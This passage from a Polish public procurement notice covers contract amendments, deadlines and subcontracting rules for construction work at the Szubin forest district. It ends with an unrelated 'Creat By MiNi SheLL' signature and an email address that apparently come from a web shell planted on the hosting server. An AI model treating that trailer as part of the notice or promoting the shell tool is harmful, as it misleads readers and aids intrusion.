a.	konieczności wykonania robót zamiennych w stosunku do przewidzianych dokumentacją projektową, gdy wykonanie tych robót będzie niezbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami, wykonania przedmiotu umowy i uzyskania założonego efektu użytkowego;
b.	konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy;
c.	wystąpienia odmiennych od przyjętych w dokumentacji projektowej warunki terenowe, 
w szczególności istnienie podziemnych urządzeń, instalacji itp.;
d.	gdy wykonanie danych robót będzie zbędne lub konieczne do prawidłowego tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami, wykonania przedmiotu umowy.
e.	redukcji części zadań do wykonania lub  zaniechania części robót stanowiących przedmiot umowy z uwagi na wykonanie robót zamiennych. W takim przypadku wynagrodzenie wykonawcy zostanie odpowiednio zmniejszone o wartość  nie zrealizowanych lub zaniechanych robót. 
Uwaga: Zmiana zakresu robót wymaga uzyskania akceptacji osób sprawujących nadzór autorski i inwestorski, a także zatwierdzenia do realizacji przez Zamawiającego.

3 Zmiana osób realizujących przedmiot umowy, wskazanych w ofercie Wykonawcy, 
           w szczególności osób określonych w pkt. 10 pkt. 1 c) i d) SIWZ może być dokonana w sytuacji:
a.	na żądanie Zamawiającego w przypadku nienależytego wykonania powierzonych prac;
b.	na wniosek Wykonawcy w przypadku:
-	śmierci, choroby lub innego zdarzenia losowego,
-	nienależytego wykonywania powierzonych prac,
-	innych obiektywnych okoliczności niezależnych od Wykonawcy (np. rezygnacji).
Uwaga: w przypadku zmiany osób, w szczególności wymienionych w pkt 10 pkt. 1 c) i d SIWZ Wykonawca musi przedstawić kandydaturę innej osoby spełniającej warunki zawarte w SIWZ i uzyskać zgodę Zamawiającego. 

4 Zmiana osoby pełniącej nadzór z ramienia Zamawiającego, może być dokonana 
           w przypadku:
a.	śmierci, choroby lub innego zdarzenia losowego,
b.	nienależytego wykonywania powierzonych prac,
c.	innych obiektywnych okoliczności niezależnych od Zamawiającego (np. rezygnacji).

5    Zmiana podwykonawców może być dokonana w sytuacji:
a.	na żądanie Zamawiającego w przypadku nienależytego wykonania powierzonych prac;
b.	na wniosek Wykonawcy w przypadku:
-	nienależytego wykonywania powierzonych prac,
-	innych obiektywnych okoliczności niezależnych od Wykonawcy (np. rezygnacji).

6   Dopuszcza się udział podwykonawców na wniosek Wykonawcy , w przypadku kiedy pierwotnie        
        Wykonawca nie zakładał ich udziału w realizacji zamówienia

7   Zmiana stawki podatku VAT będzie możliwa w przypadku gdy nastąpi zmiana obowiązujących w tym względzie     przepisów prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_torun/nadl_szubin/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Szubin
Szubin Wieś 52
89-200 Szubin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2014 godzina 09:00, miejsce: siedziba Nadleśnictwa Szubin
Nadleśnictwo Szubin
Szubin Wieś 52
89-200 Szubin
budynek A - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wymagany  termin realizacji zamówienia: wykonanie całości robót związanych z rozbudową i remontem budynku mieszkalnego - do 15.12.2014r, wykonanie pozostałych robót - do 31.07.2015r.

Informacje dotyczące umów o podwykonawstwo:
1.	Wykonawca wyłoniony w przedmiotowym postępowaniu może powierzyć wykonanie części zamówienia podwykonawcom.
2.	Zamawiający nie zastrzega obowiązku osobistego wykonania przez wyłonionego w postępowaniu Wykonawcę żadnych z  części zamówienia.
3.	W przypadku wykonywania przedmiotu zamówienia publicznego z udziałem podwykonawców, Wykonawca zobowiązany jest do wskazania w swojej ofercie części zamówienia (zakresy), których wykonanie zamierza powierzyć podwykonawcom. 
4.	Zamawiający, na potrzeby przedmiotowego postępowania, określa następujące wymagania dotyczące  umów o podwykonawstwo zawieranych przez Wykonawców z podwykonawcami (podwykonawców z dalszymi podwykonawcami):
a)	termin zapłaty wynagrodzenia  podwykonawcy (dalszemu  podwykonawcy) przewidziany w umowie o podwykonawstwo   nie   może  być  dłuższy  niż  30  dni,   licząc  od   daty  doręczenia   Wykonawcy, podwykonawcy   lub  dalszemu   podwykonawcy  faktury  lub  rachunku,   potwierdzających  wykonanie zleconej mu roboty budowlanej,
b)	termin wykonania zadań przez podwykonawcę (dalszego podwykonawcę) nie może być dłuższy niż termin wykonania zamówienia podstawowego, 
5.	Zamawiający będzie wymagał od Wykonawców (podwykonawców, dalszych podwykonawców)   deklarujących realizację   przedmiotowego   zamówienia   z   pomocą   podwykonawców   (dalszych   podwykonawców) przedłożenia, w terminie 14 dni od daty zawarcia umowy o wykonanie zamówienia publicznego między Zamawiającym a Wykonawcą (lub od daty zgłoszenia Zamawiającemu realizacji części zamówienia przez podwykonawcę,  dalszego podwykonawcę), projektu umowy o podwykonawstwo, którego przedmiotem są roboty budowlane (podwykonawcy - wraz ze zgodą Wykonawcy na jej zawarcie - o treści zgodnej z projektem umowy), a także - w terminie 7 dni od daty jej zawarcia - potwierdzonej za zgodność z oryginałem  kopii  zawartej  umowy o podwykonawstwo,  której  przedmiotem  są  roboty  budowlane. W przypadku gdy zapisy projektu (zawartej umowy) nie będą spełniać wymagań określonych w ust. 4, Zamawiający, w terminie 14 dni od otrzymania projektu (zawartej umowy) zgłosi na piśmie zastrzeżenia do projektu (sprzeciw do zawartej umowy).
6.	Niezgłoszenie przez Zamawiającego, w terminie 14 dni od daty otrzymania, zastrzeżeń do projektu umowy (sprzeciwu do zawartej umowy) oznacza akceptację projektu (zawartej umowy).
7.	Zamawiający będzie wymagał od Wykonawców (podwykonawców, dalszych podwykonawców) deklarujących realizację   przedmiotowego   zamówienia   z   pomocą   podwykonawców   (dalszych   podwykonawców) przedłożenia, w terminie 7 dni od daty jej zawarcia, potwierdzonej za zgodność z oryginałem kopii zawartej umowy o podwykonawstwo, której przedmiotem są dostawy lub usługi. Jeżeli w przedłożonej umowie został określony dłuższy termin płatności od wskazanego w ust. 4 lit. a, Zamawiający wezwie Wykonawcę (podwykonawcę, dalszego podwykonawcę) do skrócenia tego terminu do zgodnego ze wskazanym w ust. 4 lit. a,  pod rygorem wystąpienia o zapłatę kary umownej.
8.	Obowiązek     przedłożenia     potwierdzonej    za     zgodność     z oryginałem     kopii    zawartej    umowy o podwykonawstwo, o której mowa w ust.. 7 nie dotyczy umów o wartości niższej niż 0,5% wartości umowy w sprawie zamówienia publicznego.  Jeżeli jednak wartość umowy o podwykonawstwo przekracza 50 000 zł, Wykonawca w każdym przypadku ma obowiązek przedstawiania umów o podwykonawstwo.
9.	Postanowienia    niniejszego    punktu    stosuje    się    odpowiednio    do    zmian    już    zawartych      umów o podwykonawstwo.
10.	Szczegóły dotyczące rozliczania wynagrodzenia Wykonawcy i ewentualnych podwykonawców oraz pozostałe informacje związane z realizacją przedmiotowego zamówienia - istotne z punktu widzenia podwykonawstwa zawarte są w projekcie umowy, stanowiącym załącznik nr 8 do SIWZ.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com